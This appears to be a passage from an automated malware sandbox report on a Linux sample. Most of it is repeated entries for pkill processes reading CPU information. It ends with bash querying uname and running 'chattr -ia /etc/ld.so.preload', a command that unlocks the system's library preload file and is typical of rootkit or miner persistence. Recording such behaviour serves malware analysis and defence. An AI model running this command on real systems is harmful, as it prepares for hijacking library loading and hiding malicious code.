Source: /usr/bin/pkill (PID: 6244) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6247) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6248) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6251) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6253) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6254) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6276) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6277) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6278) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6281) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6282) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6283) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6286) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6287) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6288) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6291) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6292) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6295) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6296) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6297) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6298) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6301) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6303) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6306) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6309) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6310) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6311) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6314) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6315) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6318) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6319) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6320) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6323) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6324) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6325) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6328) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6329) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6330) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6333) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6334) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6336) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6339) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6340) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6341) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6344) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6345) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6348) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6349) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6352) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6353) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6355) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6358) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6359) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6360) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6363) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6365) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6370) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6371) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6372) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6373) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6376) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6377) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6378) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6381) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6382) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6383) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6386) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/bash (PID: 6216) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 6225) Args: chattr -ia /etc/ld.so.preload Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs